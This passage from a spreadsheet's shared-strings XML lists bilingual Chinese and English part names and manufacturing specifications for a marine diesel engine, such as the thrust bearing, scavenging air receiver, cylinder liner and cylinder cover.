      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无损探伤规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低合金钢热处理规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬度测试</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆螺母</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞子</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Engine seating / foundation  (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机底座</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球形螺母</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Thrust bearing assembly (FPP TYPE)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承装配图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Oil baffle upper half (Upper half)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡油盘</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Oil baffle upper half (Lower half)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Boss TYPE-A G1/2×25L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊座</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角螺母</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角头螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>罩壳</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Plate</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4.5</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>L40×40×3-402.5L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>L40×40×3-455.5L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>L40×40×3-522.5L</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Oring Φ2.5×750</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Ring (upper)</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Oil baffle plate</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Plate 200×295×</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3.2</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Plate 105×28×</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3.2</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Plate 200×327×</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3.2</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Plate 170×75×</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ｔ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3.2</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Specification / Instructions for white metal lining</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt with hole M30×35</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>10.9 Bolts</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolts with wire hole   M10×20</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Wire φ1.6</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pin 1.2×12</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥销</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pin 5×12</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Wire φ2.6</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt M20 X 45</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Hexagon head bolt M20 X 85</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架道门及防爆门布置</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Welding and quality instructions</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆门</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱加工</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Scavenging air receiver welding drawing (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱焊接</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊耳</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Rib t16</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筋板</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰链</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Welding flange </t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器检验规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Plate t19</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Scavenging air receiver assy parts (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安装件</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Seal t1.5</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抓手</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>心轴</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹板</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张力垫圈</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Pipe JIS φ76.3 X 4.2</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Pipe 65A JIS φ76.3 X 4.2</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Specification for sound and thermal insulation</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防腐蚀规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Blind flange 5K - 40A</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Gasket 5K - 40A</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <t>Additional welding drawing</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加焊接图</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon head screw M12 X 100</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <t>Cylinder block (1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Cylinder jacket (1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2)</t>
    </r>
  </si>
  <si>
    <t>Hexagon head screw M16x45</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓上紧规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性螺栓材料及测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低合金钢质量测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬度测试规范</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓质量测试规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <t>Teflon strip upper insul. bandage</t>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特氟龙绝缘带</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套隔热带垫片</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套首制件认可</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜垫片</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能检查手册</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸油注油器标记</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖装配</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖毛坯订货图</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽螺栓</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱销</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带垫圈螺母</t>
    </r>
    <phoneticPr fontId="28"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖制造规范</t>
    </r>
    <phoneticPr fontId="19" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造缸盖首制件认可</t>
    </r>
